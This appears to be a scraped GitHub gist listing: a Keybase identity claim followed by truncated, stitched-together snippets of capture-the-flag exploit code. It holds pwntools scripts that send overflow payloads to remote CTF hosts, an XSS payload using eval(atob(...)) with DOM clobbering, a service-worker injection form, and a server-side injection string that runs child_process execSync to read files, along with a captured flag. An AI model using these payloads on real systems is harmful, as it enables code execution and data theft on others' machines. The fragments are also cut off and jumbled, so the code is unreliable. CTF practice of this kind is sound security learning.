I hereby claim:
- I am posix-lee on github.
- I am posix (https://keybase.io/posix) on keybase.
- I have a public key whose fingerprint is 8A8E 554E 754D BD83 79F8 9A4A 6DE9 FFC9 30A8 4F20
To claim this, I am signing this object:
from pwn import * | |
from ctypes import * | |
from time import sleep | |
context.log_level = 'debug' | |
rlibc = CDLL('./libc.so') | |
rlibc.srand(rlibc.time(0)) | |
# p = process('./chall') |
I hereby claim:
To claim this, I am signing this object:
from pwn import * | |
context.log_level = 'debug' | |
# p = process('./qemu-aarch64 -L . -g 1234 ./vuln'.split(' ')) | |
p = remote('pwn.zh3r0.cf', 1111) | |
e = ELF('./vuln') | |
p.send('a'*8) | |
p.recvuntil('a'*8) |
from pwn import * | |
p = remote('20.42.99.115', 3000) | |
payload = b'\1'*150 | |
p.sendline(payload) | |
p.interactive() |
from pwn import * | |
# p = process('./game') | |
p = remote('cop.ichsa.ctf.today', 8011) | |
for i in range(0x90): | |
p.sendlineafter('Please chose an option', '2') | |
p.sendlineafter('Please chose an option', '2') | |
payload = b'aaaaaa' + p64(0x401813)*16 |
<a id=context><iframe id=context name=apiPublicKey href="x"></iframe><iframe id=context name=auth href="x" b=y></iframe><iframe id=context name=disqusUrl href="x"></iframe></a> | |
<div id="account-nav"></div><div id="anon-account-nav-tmpl">${eval(atob(`YWxlcnQob3JpZ2luKQ`))}</div> | |
* repeat below if you want to improve the reliability | |
```mermaid | |
graph LR; | |
A-->B; | |
click B callback "<script src=https://a.disquscdn.com/1608164631/build/js/abadd50d331d.js></script><script src=https://a.disquscdn.com/1608164631/js/src/global.js></script>" | |
``` |
<iframe srcdoc="<form action="https://amazingnotes.asisctf.com:444/" method="POST" id=x> | |
<input name=ext value=es> | |
<textarea name=note> | |
self.addEventListener("fetch", function(event) { | |
if(event.request.url.indexOf("flag") != -1) | |
return; | |
event.respondWith(new Response(` | |
<img src=//p6.is/givemeflag> | |
<script> |
'+constructor.constructor("return process")().mainModule.require("child_process").execSync('cat * | grep CSR')+'
CSR{r363x_15_fun_r363x_15_l0v3}
function WeakMap(...e) { | |
return { | |
set: (...e)=>{ | |
console.log(e) | |
}, | |
has: () => { | |
console.log(87) | |
return 1; | |
} | |
} |
digraph g1 { | |
subgraph cluster_0 { | |
style=filled; | |
color=lightgrey; | |
node [style=filled, color=white]; | |
a0 -> a1 -> a2 -> a3; | |
} | |
start -> a0; | |
a3 -> end; | |
a1 -> b3; |